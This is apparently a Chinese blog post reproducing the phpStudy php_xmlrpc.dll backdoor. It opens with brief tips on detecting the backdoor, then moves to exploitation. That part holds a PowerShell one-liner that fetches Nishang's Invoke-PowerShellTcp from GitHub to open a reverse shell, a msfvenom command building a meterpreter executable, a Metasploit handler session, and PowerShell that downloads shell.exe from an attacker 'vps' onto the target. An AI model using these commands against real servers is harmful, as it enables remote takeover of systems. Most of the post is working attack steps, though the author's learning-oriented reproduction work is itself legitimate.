0%

phpstudy后门复现记录

正文

复现

先来说一下怎么检查自己的phpstudy是否有后门:

  • 官网查看phpstudysetup.exe的md5校验码

  • 查看php_xmlrpc.dll这个文件仲是否有@eval(%s('%s'))字样

出现这样字样,那就恭喜你,中奖了。

后门怎么形成的,这对于我这只学web的菜鸟就不知道,就看看师傅们发的博客进行了一波复现学习

就是通过修改Accept-Charset响应头,就OK了,到此就复现完了

利用

利用当然就是向反弹一个shell回来咯(手动滑稽)

反弹shell

使用powershell进行反弹:

1
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 反弹ip -port ip端口

后渗透

在kali机上生成exe木马

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.220.142 LPORT=23333 -f exe > shell.exe

然后把木马上传到服务器上,然后在kali上监听LHOST

1
2
3
4
5
6
7
8
9
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.220.142
LhOST => 192.168.220.142
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set LRORT 23333
LPoRT => 23333
msf5 exploit(multi/handler) > exploit

准备就绪后,就差把shell传到目标机上了,在反弹的shell中输入:

1
2
$client = new-object System.Net.WebClient
$client.DownloadFile('http://vps/shell.exe', 'shell.exe')

执行shell.exe文件即可

这里不知道怎么回事儿,kali中弹不了meter的后渗透的shell